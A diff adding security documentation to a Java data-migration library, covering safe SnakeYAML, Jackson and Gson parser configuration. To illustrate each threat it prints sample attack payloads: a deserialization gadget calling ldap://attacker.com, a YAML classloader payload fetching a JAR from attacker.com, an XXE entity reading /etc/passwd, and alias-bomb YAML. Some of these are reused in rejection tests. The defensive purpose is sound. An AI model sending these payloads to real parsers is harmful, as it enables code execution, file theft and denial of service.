+++ b/docs/security/format-considerations/index.md
@@ -0,0 +1,105 @@
+# Format-Specific Security Considerations
+
+Each serialization format supported by Aether Datafixers has unique security characteristics. This section provides detailed guidance for secure configuration of each format.
+
+## Risk Summary
+
+| Format | Library | Risk Level | Primary Concerns |
+|--------|-----------|--------------|-----------------------------------------------|
+| YAML | SnakeYAML | **Critical** | Arbitrary code execution, Billion Laughs |
+| YAML | Jackson | Low-Medium | Depth limits only |
+| XML | Jackson | **High** | XXE, Entity expansion |
+| JSON | Jackson | Medium | Polymorphic typing (if enabled), depth limits |
+| JSON | Gson | Low | Minimal attack surface |
+| TOML | Jackson | Low | Limited attack surface |
+
+## Format-Specific Guides
+
+### [SnakeYAML Security](snakeyaml.md)
+
+**Risk Level: Critical**
+
+SnakeYAML's default configuration allows arbitrary Java class instantiation, making it extremely dangerous for untrusted input. This guide covers:
+
+- Arbitrary code execution prevention
+- Billion Laughs attack mitigation
+- Safe `LoaderOptions` configuration
+- Complete secure setup example
+
+### [Jackson Security](jackson.md)
+
+**Risk Level: Medium-High (format dependent)**
+
+Jackson is used for JSON, YAML, XML, and TOML. Security considerations vary by format:
+
+- **JSON:** Polymorphic deserialization risks
+- **YAML:** Fewer risks than SnakeYAML (no arbitrary constructors)
+- **XML:** XXE vulnerabilities
+- **All:** Depth and size limits
+
+### [Gson Security](gson.md)
+
+**Risk Level: Low**
+
+Gson has a relatively small attack surface by default. This guide covers:
+
+- Safe default behavior
+- Pre-validation recommendations
+- Depth validation patterns
+
+## Quick Reference
+
+### SnakeYAML: Always Use SafeConstructor
+
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+```
+
+### Jackson XML: Disable External Entities
+
+```java
+XMLInputFactory xmlFactory = XMLInputFactory.newFactory();
+xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+```
+
+### Jackson JSON: Configure Read Constraints
+
+```java
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+```
+
+### Jackson: Never Enable Default Typing
+
+```java
+// DANGEROUS - Never do this with untrusted data:
+// mapper.enableDefaultTyping();
+
+// DANGEROUS - Also avoid:
+// mapper.activateDefaultTyping(mapper.getPolymorphicTypeValidator());
+```
+
+## Decision Matrix
+
+Use this matrix to determine which security measures to apply:
+
+| Data Source | SnakeYAML | Jackson JSON | Jackson XML | Gson |
+|-------------------|--------------------------|-----------------|----------------|----------------|
+| User uploads | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| External APIs | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| Message queues | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| Internal services | Consider SafeConstructor | Optional limits | XXE prevention | Default OK |
+| Local config | Default OK | Default OK | Default OK | Default OK |
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/format-considerations/jackson.md b/docs/security/format-considerations/jackson.md
new file mode 100644
index 0000000..1fc7cac
--- /dev/null
+++ b/docs/security/format-considerations/jackson.md
@@ -0,0 +1,328 @@
+# Jackson Security
+
+Jackson is used by Aether Datafixers for JSON, YAML, XML, and TOML via `JacksonJsonOps`, `JacksonYamlOps`, `JacksonXmlOps`, and `JacksonTomlOps`. Each format has specific security considerations.
+
+## Overview
+
+| Format | Ops Class | Risk Level | Key Concerns |
+|--------|------------------|------------|-------------------------------------|
+| JSON | `JacksonJsonOps` | Medium | Polymorphic typing, resource limits |
+| YAML | `JacksonYamlOps` | Low-Medium | Fewer features than SnakeYAML |
+| XML | `JacksonXmlOps` | **High** | XXE, Entity expansion |
+| TOML | `JacksonTomlOps` | Low | Minimal attack surface |
+
+---
+
+## Polymorphic Deserialization
+
+### The Vulnerability
+
+Jackson's "default typing" feature allows JSON to specify which Java class to instantiate. This is extremely dangerous with untrusted input:
+
+```java
+// DANGEROUS - Never do this with untrusted data
+ObjectMapper mapper = new ObjectMapper();
+mapper.enableDefaultTyping(); // VULNERABLE!
+```
+
+Attackers can exploit this to execute arbitrary code:
+
+```json
+{
+ "@class": "com.sun.rowset.JdbcRowSetImpl",
+ "dataSourceName": "ldap://attacker.com/exploit",
+ "autoCommit": true
+}
+```
+
+### Safe Configuration
+
+**Never enable default typing for untrusted data:**
+
+```java
+// SAFE - Default configuration (no polymorphic typing)
+ObjectMapper mapper = new ObjectMapper();
+// Do NOT call enableDefaultTyping() or activateDefaultTyping()
+```
+
+**If polymorphic typing is absolutely required**, use an allowlist:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+mapper.activateDefaultTyping(
+ BasicPolymorphicTypeValidator.builder()
+ .allowIfSubType(SafeBaseClass.class) // Only allow specific types
+ .build(),
+ ObjectMapper.DefaultTyping.NON_FINAL
+);
+```
+
+---
+
+## StreamReadConstraints (Jackson 2.15+)
+
+Jackson 2.15+ provides `StreamReadConstraints` to limit resource consumption:
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50) // Prevent stack overflow
+ .maxNumberLength(100) // Limit number string length
+ .maxStringLength(1_000_000) // 1MB max string
+ .maxNameLength(50_000) // Limit field name length
+ .maxDocumentLength(10_000_000) // 10MB max document (Jackson 2.16+)
+ .build();
+
+JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+```
+
+### Constraint Reference
+
+| Constraint | Default | Recommended | Purpose |
+|---------------------|-----------|-------------|-----------------------------|
+| `maxNestingDepth` | 1000 | 50-100 | Prevent stack overflow |
+| `maxStringLength` | 20MB | 1-10MB | Limit memory per string |
+| `maxNumberLength` | 1000 | 100 | Prevent huge number strings |
+| `maxNameLength` | 50000 | 1000 | Limit field name length |
+| `maxDocumentLength` | unlimited | 10MB | Total document size |
+
+---
+
+## XXE Prevention
+
+### The Vulnerability
+
+XML External Entity (XXE) attacks allow attackers to:
+- Read local files (`file:///etc/passwd`)
+- Perform SSRF (`http://internal-server/`)
+- Cause DoS via entity expansion
+
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<foo>&xxe;</foo>
+```
+
+### Secure JacksonXmlOps Configuration
+
+```java
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureXmlMapperFactory {
+
+ public static XmlMapper createSecureXmlMapper() {
+ // Create secure XMLInputFactory
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+ // Disable external entities (XXE prevention)
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+ // Disable DTD processing
+ xmlInputFactory.setProperty(
+ XMLInputFactory.SUPPORT_DTD, false);
+
+ // Disable entity reference replacement
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Build secure XmlMapper
+ return XmlMapper.builder(
+ XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .build()
+ ).build();
+ }
+}
+
+// Usage with JacksonXmlOps
+XmlMapper secureMapper = SecureXmlMapperFactory.createSecureXmlMapper();
+JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper);
+```
+
+### XMLInputFactory Properties Reference
+
+| Property | Value | Purpose |
+|----------|-------|---------|
+| `IS_SUPPORTING_EXTERNAL_ENTITIES` | `false` | Block external entity loading |
+| `SUPPORT_DTD` | `false` | Disable DTD processing entirely |
+| `IS_REPLACING_ENTITY_REFERENCES` | `false` | Don't expand entities |
+| `IS_VALIDATING` | `false` | Skip DTD validation |
+
+---
+
+## Complete Secure Configurations
+
+### Secure JacksonJsonOps
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+ public static JacksonJsonOps createSecureOps() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxNumberLength(100)
+ .maxStringLength(1_000_000)
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ ObjectMapper mapper = new ObjectMapper(factory);
+
+ return new JacksonJsonOps(mapper);
+ }
+}
+
+// Usage
+JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+JsonNode node = secureOps.mapper().readTree(untrustedJson);
+Dynamic dynamic = new Dynamic<>(secureOps, node);
+```
+
+### Secure JacksonYamlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+ public static JacksonYamlOps createSecureOps() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ YAMLFactory factory = YAMLFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ YAMLMapper mapper = new YAMLMapper(factory);
+
+ return new JacksonYamlOps(mapper);
+ }
+}
+```
+
+### Secure JacksonXmlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+ public static JacksonXmlOps createSecureOps() {
+ // Secure XML parsing
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+ xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+ xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+ xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Resource limits
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ XmlMapper mapper = XmlMapper.builder(factory).build();
+
+ return new JacksonXmlOps(mapper);
+ }
+}
+```
+
+---
+
+## Deserialization Features
+
+Additional security-relevant features:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+
+// Fail on unknown properties (defense in depth)
+mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, true);
+
+// Fail on null for primitives
+mapper.configure(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES, true);
+
+// Fail on missing creator properties
+mapper.configure(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES, true);
+```
+
+---
+
+## Testing Security Configuration
+
+```java
+@Test
+void rejectsXxeAttack() {
+    String xxePayload = """
+            <?xml version="1.0"?>
+            <!DOCTYPE foo [
+              <!ENTITY xxe SYSTEM "file:///etc/passwd">
+            ]>
+            <foo>&xxe;</foo>
+            """;
+
+ JacksonXmlOps secureOps = SecureJacksonXmlConfig.createSecureOps();
+
+ assertThrows(Exception.class, () ->
+ secureOps.mapper().readTree(xxePayload)
+ );
+}
+
+@Test
+void rejectsDeeplyNestedJson() {
+ // Create deeply nested JSON
+ StringBuilder json = new StringBuilder();
+ for (int i = 0; i < 100; i++) json.append("{\"a\":");
+ json.append("1");
+ for (int i = 0; i < 100; i++) json.append("}");
+
+ JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+
+ assertThrows(StreamConstraintsException.class, () ->
+ secureOps.mapper().readTree(json.toString())
+ );
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [XML Support](../../codec/xml.md)
+- [YAML Support](../../codec/yaml.md)
diff --git a/docs/security/format-considerations/snakeyaml.md b/docs/security/format-considerations/snakeyaml.md
new file mode 100644
index 0000000..6706754
--- /dev/null
+++ b/docs/security/format-considerations/snakeyaml.md
@@ -0,0 +1,316 @@
+# SnakeYAML Security
+
+> **CRITICAL WARNING:** SnakeYAML's default configuration allows arbitrary Java class instantiation,
+> which can lead to **Remote Code Execution (RCE)**. Never use the default `Yaml()` constructor
+> with untrusted input.
+
+## Overview
+
+SnakeYAML is a powerful YAML parser that supports YAML 1.1 features including custom tags and constructors. However, this power comes with significant security risks when processing untrusted data.
+
+| Risk | Severity | Mitigation |
+|----------------------------------|--------------|----------------------------------|
+| Arbitrary Code Execution | **Critical** | Use `SafeConstructor` |
+| Billion Laughs (Alias Expansion) | High | Limit `maxAliasesForCollections` |
+| Stack Overflow | Medium | Limit `nestingDepthLimit` |
+| Resource Exhaustion | Medium | Limit `codePointLimit` |
+
+## Arbitrary Code Execution
+
+### The Vulnerability
+
+SnakeYAML's default constructor can instantiate arbitrary Java classes using YAML tags:
+
+```yaml
+# This YAML can execute arbitrary code with default Yaml()
+!!javax.script.ScriptEngineManager [
+ !!java.net.URLClassLoader [[
+ !!java.net.URL ["http://attacker.com/malicious.jar"]
+ ]]
+]
+```
+
+When parsed with `new Yaml().load(input)`, this:
+1. Creates a `URLClassLoader` pointing to an attacker's server
+2. Loads a malicious JAR file
+3. Instantiates `ScriptEngineManager` with the malicious classloader
+4. Executes arbitrary code on your server
+
+### Other Dangerous Payloads
+
+```yaml
+# Execute shell command (via ProcessBuilder)
+!!java.lang.ProcessBuilder [["calc.exe"]]
+
+# JNDI injection
+!!com.sun.rowset.JdbcRowSetImpl
+ dataSourceName: "ldap://attacker.com/exploit"
+ autoCommit: true
+```
+
+### The Solution: SafeConstructor
+
+**Always** use `SafeConstructor` when parsing untrusted YAML:
+
+```java
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import org.yaml.snakeyaml.LoaderOptions;
+
+// UNSAFE - Never do this with untrusted input:
+// Yaml yaml = new Yaml();
+
+// SAFE - Always use SafeConstructor:
+Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
+Object data = yaml.load(untrustedInput);
+```
+
+`SafeConstructor` only allows construction of basic Java types:
+- `String`, `Integer`, `Long`, `Double`, `Boolean`
+- `List`, `Map`
+- `Date`, `byte[]`
+
+Any YAML with custom tags (`!!classname`) will throw an exception.
+
+---
+
+## Billion Laughs Attack
+
+### The Vulnerability
+
+YAML aliases allow referencing previously defined anchors. Attackers can create exponentially expanding structures:
+
+```yaml
+a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
+b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
+c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
+d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
+e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
+f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
+g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
+h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
+i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
+```
+
+This small YAML file expands to **billions** of strings, consuming all available memory.
+
+### The Solution: Limit Alias Expansion
+
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50); // Default is 50, adjust as needed
+
+Yaml yaml = new Yaml(new SafeConstructor(options));
+```
+
+With this limit, the parser throws an exception when alias expansion exceeds the threshold.
+
+---
+
+## Complete Secure Configuration
+
+Use this configuration for all untrusted YAML:
+
+```java
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+public class SecureYamlParser {
+
+ private static final int MAX_ALIASES = 50;
+ private static final int MAX_DEPTH = 50;
+ private static final int MAX_CODE_POINTS = 3 * 1024 * 1024; // 3MB
+
+ private final Yaml yaml;
+
+ public SecureYamlParser() {
+ LoaderOptions options = new LoaderOptions();
+
+ // Prevent Billion Laughs attack
+ options.setMaxAliasesForCollections(MAX_ALIASES);
+
+ // Prevent stack overflow from deep nesting
+ options.setNestingDepthLimit(MAX_DEPTH);
+
+ // Limit total input size
+ options.setCodePointLimit(MAX_CODE_POINTS);
+
+ // Reject duplicate keys (data integrity)
+ options.setAllowDuplicateKeys(false);
+
+ // Use SafeConstructor to prevent RCE
+ this.yaml = new Yaml(new SafeConstructor(options));
+ }
+
+    public Dynamic<Object> parse(String untrustedYaml) {
+        Object data = yaml.load(untrustedYaml);
+        return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+    }
+
+    public Dynamic<Object> parse(InputStream untrustedInput) {
+        Object data = yaml.load(untrustedInput);
+        return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+    }
+}
+```
+
+---
+
+## LoaderOptions Reference
+
+| Option | Default | Recommended | Purpose |
+|----------------------------|---------|-------------------|---------------------------|
+| `maxAliasesForCollections` | 50 | 50 or less | Prevent Billion Laughs |
+| `nestingDepthLimit` | 50 | 50 or less | Prevent stack overflow |
+| `codePointLimit` | 3MB | Based on use case | Limit input size |
+| `allowDuplicateKeys` | true | **false** | Data integrity |
+| `allowRecursiveKeys` | false | false | Prevent recursive anchors |
+| `wrappedToRootException` | false | true | Better error handling |
+
+---
+
+## Integration with Aether Datafixers
+
+### Secure Migration Service
+
+```java
+public class SecureYamlMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final Yaml yaml;
+
+ public SecureYamlMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ options.setNestingDepthLimit(50);
+ options.setCodePointLimit(3 * 1024 * 1024);
+ options.setAllowDuplicateKeys(false);
+
+ this.yaml = new Yaml(new SafeConstructor(options));
+ }
+
+    public TaggedDynamic<Object> migrate(
+            String untrustedYaml,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) {
+
+        // Parse with safe settings
+        Object data = yaml.load(untrustedYaml);
+        Dynamic<Object> dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+
+        // Migrate
+        TaggedDynamic<Object> tagged = new TaggedDynamic<>(type, dynamic);
+        return fixer.update(tagged, from, to);
+    }
+}
+```
+
+### Pre-Validation
+
+For additional security, validate input before parsing:
+
+```java
+public class YamlValidator {
+
+ private static final long MAX_SIZE = 1024 * 1024; // 1MB
+
+ public void validateBeforeParsing(byte[] input) {
+ if (input.length > MAX_SIZE) {
+ throw new SecurityException("YAML input exceeds maximum size");
+ }
+ }
+
+ public void validateBeforeParsing(String input) {
+ if (input.length() > MAX_SIZE) {
+ throw new SecurityException("YAML input exceeds maximum size");
+ }
+ }
+}
+```
+
+---
+
+## Testing Your Configuration
+
+Verify your configuration rejects malicious payloads:
+
+```java
+@Test
+void rejectsArbitraryClassInstantiation() {
+ String maliciousYaml = "!!java.lang.ProcessBuilder [[\"calc.exe\"]]";
+
+ Yaml safeYaml = new Yaml(new SafeConstructor(new LoaderOptions()));
+
+ assertThrows(YAMLException.class, () -> safeYaml.load(maliciousYaml));
+}
+
+@Test
+void rejectsBillionLaughs() {
+ String billionLaughs = """
+ a: &a ["lol"]
+ b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
+ c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
+ d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
+ e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
+ f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
+ """;
+
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ Yaml safeYaml = new Yaml(new SafeConstructor(options));
+
+ assertThrows(YAMLException.class, () -> safeYaml.load(billionLaughs));
+}
+```
+
+---
+
+## Common Mistakes
+
+### Mistake 1: Using Default Constructor
+
+```java
+// WRONG - Vulnerable to RCE
+Yaml yaml = new Yaml();
+Object data = yaml.load(userInput);
+```
+
+### Mistake 2: Using Custom Constructor Without SafeConstructor
+
+```java
+// WRONG - Custom constructor may still be vulnerable
+class MyConstructor extends Constructor {
+ // ...
+}
+Yaml yaml = new Yaml(new MyConstructor());
+```
+
+### Mistake 3: Forgetting LoaderOptions
+
+```java
+// WRONG - No limits on aliases or depth
+Yaml yaml = new Yaml(new SafeConstructor()); // Uses default LoaderOptions
+```
+
+**Correct:**
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+Yaml yaml = new Yaml(new SafeConstructor(options));
+```
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [YAML Support](../../codec/yaml.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/index.md b/docs/security/index.md
new file mode 100644
index 0000000..ddb17df
--- /dev/null
+++ b/docs/security/index.md
@@ -0,0 +1,118 @@
+# Security Overview
+
+This section provides guidance for securely handling untrusted data with Aether Datafixers. When processing data from external sources—user uploads, APIs, message queues, or file imports—proper security measures are essential to prevent attacks.
+
+## Quick Reference
+
+| Threat | Affected Formats | Risk | Mitigation |
+|-----------------------------------|------------------|--------------|---------------------------|
+| Arbitrary Code Execution | YAML (SnakeYAML) | **Critical** | Use `SafeConstructor` |
+| Billion Laughs (Entity Expansion) | YAML, XML | High | Limit aliases/entities |
+| XXE (External Entity Injection) | XML | High | Disable external entities |
+| Polymorphic Deserialization | JSON (Jackson) | Medium | Avoid default typing |
+| Resource Exhaustion | All | Medium | Size and depth limits |
+| Stack Overflow | All | Medium | Nesting depth limits |
+
+## When to Apply Security Measures
+
+Apply the security recommendations in this documentation when:
+
+- **User Uploads** — Processing files uploaded by users (game saves, configs, data imports)
+- **External APIs** — Consuming data from third-party APIs
+- **Message Queues** — Processing messages from queues (Kafka, RabbitMQ, etc.)
+- **Database Blobs** — Migrating serialized data stored in databases
+- **File Imports** — Reading configuration or data files from untrusted sources
+
+## Documentation Structure
+
+### [Threat Model](threat-model.md)
+
+Understand the attack vectors and trust boundaries:
+- Classification of untrusted data sources
+- Detailed attack vector descriptions
+- Impact assessment and risk analysis
+
+### [Format-Specific Security](format-considerations/index.md)
+
+Security considerations for each serialization format:
+- [SnakeYAML Security](format-considerations/snakeyaml.md) — **Critical: RCE prevention**
+- [Jackson Security](format-considerations/jackson.md) — XXE, polymorphic typing, depth limits
+- [Gson Security](format-considerations/gson.md) — Safe defaults and validation
+
+### [Best Practices](best-practices.md)
+
+General security best practices:
+- Input validation before migration
+- Size and depth limits
+- Timeout configuration
+- Defense-in-depth checklist
+
+### [Secure Configuration Examples](secure-configuration-examples.md)
+
+Ready-to-use secure configurations:
+- Safe `Yaml` setup for SnakeYAML
+- Safe `ObjectMapper` setup for Jackson
+- Safe `XmlMapper` setup for Jackson XML
+- Complete migration service example
+
+### [Spring Security Integration](spring-security-integration.md)
+
+Integrating security with Spring Boot:
+- Secure bean configuration
+- Request validation filters
+- Rate limiting
+- Audit logging
+
+## Quick Start: Secure Configuration
+
+### SnakeYAML (Critical)
+
+```java
+// ALWAYS use SafeConstructor for untrusted YAML
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+options.setCodePointLimit(3 * 1024 * 1024);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+Object data = safeYaml.load(untrustedInput);
+Dynamic<Object> dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+```
+
+### Jackson JSON
+
+```java
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic<JsonNode> dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, node);
+```
+
+### Jackson XML (XXE Prevention)
+
+```java
+XMLInputFactory xmlFactory = XMLInputFactory.newFactory();
+xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+XmlMapper safeMapper = XmlMapper.builder(
+ XmlFactory.builder().xmlInputFactory(xmlFactory).build()
+).build();
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic<JsonNode> dynamic = new Dynamic<>(JacksonXmlOps.INSTANCE, node);
+```
+
+## Related
+
+- [Codec Overview](../codec/index.md)
+- [YAML Support](../codec/yaml.md)
+- [XML Support](../codec/xml.md)
+- [JSON Support](../codec/json.md)
diff --git a/docs/security/secure-configuration-examples.md b/docs/security/secure-configuration-examples.md
new file mode 100644
index 0000000..4d75c9d
--- /dev/null
+++ b/docs/security/secure-configuration-examples.md
@@ -0,0 +1,513 @@
+# Secure Configuration Examples
+
+This document provides ready-to-use secure configurations for all supported formats. Copy and adapt these examples for your application.
+
+## Quick Reference
+
+| Format | Primary Risk | Required Configuration |
+|--------------|---------------------------|-------------------------------------|
+| SnakeYAML | RCE | `SafeConstructor` + `LoaderOptions` |
+| Jackson JSON | Polymorphic typing, depth | `StreamReadConstraints` |
+| Jackson XML | XXE | Disable external entities |
+| Jackson YAML | Depth | `StreamReadConstraints` |
+| Gson | Large payloads | Pre-validation |
+
+---
+
+## SnakeYAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+public class SecureSnakeYamlConfig {
+
+ /**
+ * Creates a secure Yaml instance for parsing untrusted input.
+ */
+ public static Yaml createSecureYaml() {
+ LoaderOptions options = new LoaderOptions();
+
+ // Prevent Billion Laughs (alias expansion attack)
+ options.setMaxAliasesForCollections(50);
+
+ // Prevent stack overflow from deep nesting
+ options.setNestingDepthLimit(50);
+
+ // Limit input size (3MB default)
+ options.setCodePointLimit(3 * 1024 * 1024);
+
+ // Reject duplicate keys for data integrity
+ options.setAllowDuplicateKeys(false);
+
+ // Use SafeConstructor to prevent arbitrary class instantiation
+ return new Yaml(new SafeConstructor(options));
+ }
+
+ /**
+ * Parses untrusted YAML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String yaml) {
+ Yaml safeYaml = createSecureYaml();
+ Object data = safeYaml.load(yaml);
+ return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+ }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted YAML
+String untrustedYaml = request.getBody();
+Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.PLAYER, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson JSON Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+ /**
+ * Creates a secure ObjectMapper for parsing untrusted JSON.
+ */
+ public static ObjectMapper createSecureMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50) // Prevent stack overflow
+ .maxNumberLength(100) // Limit number string length
+ .maxStringLength(1_000_000) // 1MB max string
+ .maxNameLength(1_000) // Limit field name length
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new ObjectMapper(factory);
+ }
+
+ /**
+ * Creates secure JacksonJsonOps instance.
+ */
+ public static JacksonJsonOps createSecureOps() {
+ return new JacksonJsonOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted JSON securely and returns a Dynamic.
+ */
+    public static Dynamic parseSecurely(String json) throws Exception {
+        JacksonJsonOps ops = createSecureOps();
+        JsonNode node = ops.mapper().readTree(json);
+        return new Dynamic<>(ops, node);
+    }
+
+ /**
+ * Parses untrusted JSON securely with custom ops.
+ */
+ public static Dynamic parseSecurely(byte[] json) throws Exception {
+ JacksonJsonOps ops = createSecureOps();
+ JsonNode node = ops.mapper().readTree(json);
+ return new Dynamic<>(ops, node);
+ }
+}
+```
+
+### Usage Example
+
